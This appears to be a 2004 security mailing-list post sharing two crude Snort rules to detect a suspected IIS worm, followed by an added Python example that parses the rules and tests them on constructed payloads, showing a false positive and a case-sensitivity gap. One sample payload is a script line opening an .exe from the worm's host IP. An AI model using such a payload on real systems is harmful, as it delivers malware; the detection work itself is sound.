[Intrusions] FW: [Snort-sigs] Unknown IIS Worm Sigs
Robert Wagner
rwagner at eruces.com
Fri Jun 25 13:12:30 GMT 2004
-----Original Message-----
From: Matthew Jonkman [mailto:matt at infotex.com]
Sent: Thursday, June 24, 2004 7:05 PM
To: snort-sigs mailinglist
Subject: [Snort-sigs] Unknown IIS Worm Sigs
Reports of a potential 0-day IIS exploit are coming in, best documented
at isc.sans.org.
Here are a couple VERY crude rules to hopefully detect the infectious
code. These are posted on bleedingsnort.com in the bleeding.rules.
Suggestions are MORE than welcome if you're seeing anything. These are
just looking for a couple unique strings in the small bit of code we have.
alert ip any any -> any any (msg:"BLEEDING-EDGE Unknown IIS Worm Code in Transit"; content:"217.107.218.147"; classtype:trojan-activity; sid:2000311; rev:1;)

alert ip any any -> any any (msg:"BLEEDING-EDGE Unknown IIS Worm Code in Transit"; content:"function gc099"; classtype:trojan-activity; sid:2000312; rev:1;)
Yes, I know it'll be very prone to false positives (this email will kick
them both off). Better than nothing till we know more.
Suggestions and more information VERY welcome.
Matt
--------------------------------------------
Matthew Jonkman, CISSP
Senior Security Engineer
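The following is an added worked example, not part of Matt's post or of the bleeding.rules file: a minimal Python re-implementation of the Snort content-match logic that the two rules above rely on, run over constructed sample payloads (none of them are real captures). It parses the rules as posted, applies Snort's default case-sensitive content matching (with `nocase` and `|hex|` sections handled), and shows both the intended hit on a worm-like fragment and the false positive Matt predicts: any traffic that merely quotes the rules, such as this email in transit, trips both signatures. The `nocase` variant at the end is an assumption for illustration, not a suggested rule change.

```python
import re
from dataclasses import dataclass, field

# The two rules exactly as posted, one rule per line.
BLEEDING_RULES = '''
alert ip any any -> any any (msg:"BLEEDING-EDGE Unknown IIS Worm Code in Transit"; content:"217.107.218.147"; classtype:trojan-activity; sid:2000311; rev:1;)
alert ip any any -> any any (msg:"BLEEDING-EDGE Unknown IIS Worm Code in Transit"; content:"function gc099"; classtype:trojan-activity; sid:2000312; rev:1;)
'''


@dataclass
class Rule:
    sid: int
    msg: str
    contents: list = field(default_factory=list)  # [(pattern_bytes, nocase_flag)]


# "action proto src sport -> dst dport (options)"
_HEADER = re.compile(r'^\w+\s+\w+\s+\S+\s+\S+\s+(?:->|<>)\s+\S+\s+\S+\s*\((.*)\)\s*$')
# "key;" or "key:value;" where value may be a quoted string containing ';'
_OPTION = re.compile(r'\s*(\w+)(?::\s*("(?:[^"\\]|\\.)*"|[^;]*))?\s*;')


def decode_content(text):
    """Turn a Snort content string into bytes; |41 42| pipe sections are hex."""
    out = bytearray()
    for i, piece in enumerate(text.split('|')):
        if i % 2:
            out += bytes.fromhex(piece)
        else:
            out += piece.replace('\\"', '"').encode('latin-1')
    return bytes(out)


def parse_rules(text):
    """Parse the subset of Snort rule syntax these signatures use."""
    rules = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith('#'):
            continue
        m = _HEADER.match(line)
        if not m:
            raise ValueError(f'unparseable rule: {line}')
        rule = Rule(sid=0, msg='')
        for key, val in _OPTION.findall(m.group(1)):
            if val.startswith('"'):
                val = val[1:-1]
            if key == 'content':
                rule.contents.append((decode_content(val), False))
            elif key == 'nocase' and rule.contents:
                # nocase modifies the content option that precedes it
                pat, _ = rule.contents[-1]
                rule.contents[-1] = (pat, True)
            elif key == 'msg':
                rule.msg = val
            elif key == 'sid':
                rule.sid = int(val)
        rules.append(rule)
    return rules


def matches(payload, rules):
    """Return sids of rules whose every content string occurs in payload.

    Snort content matching is case-sensitive unless the content carries nocase.
    """
    hits = []
    lowered = payload.lower()
    for rule in rules:
        if not rule.contents:
            continue
        if all((pat.lower() in lowered) if nocase else (pat in payload)
               for pat, nocase in rule.contents):
            hits.append(rule.sid)
    return sorted(hits)


RULES = parse_rules(BLEEDING_RULES)

# Constructed sample payloads for illustration; not real captures.
SAMPLES = {
    'script_fragment': b'<script>function gc099(){ window.open("http://217.107.218.147/x.exe") }</script>',
    'benign_request': b'GET /index.html HTTP/1.1\r\nHost: www.example.com\r\n\r\n',
    'uppercase_variant': b'FUNCTION GC099 ... 217.107.218.147',
    'this_email': BLEEDING_RULES.encode(),  # the post itself quoting the rules
}


def scan_samples():
    """Run both rules over every sample; the email sample fires both (the false positive)."""
    return {name: matches(data, RULES) for name, data in SAMPLES.items()}


def with_nocase():
    """Hypothetical variant of sid 2000312 with nocase, run over the uppercase sample."""
    relaxed = BLEEDING_RULES.replace('content:"function gc099";',
                                     'content:"function gc099"; nocase;')
    return matches(SAMPLES['uppercase_variant'], parse_rules(relaxed))


if __name__ == '__main__':
    for name, sids in scan_samples().items():
        print(f'{name:18s} -> {sids or "no alert"}')
    print(f'uppercase with nocase -> {with_nocase()}')
```

The `uppercase_variant` sample only trips sid 2000311: the IP string is case-free, but `function gc099` is not, so a trivially re-cased copy of the code slips past the second rule under Snort's default matching. The `this_email` sample trips both, which is exactly the false positive Matt warns about.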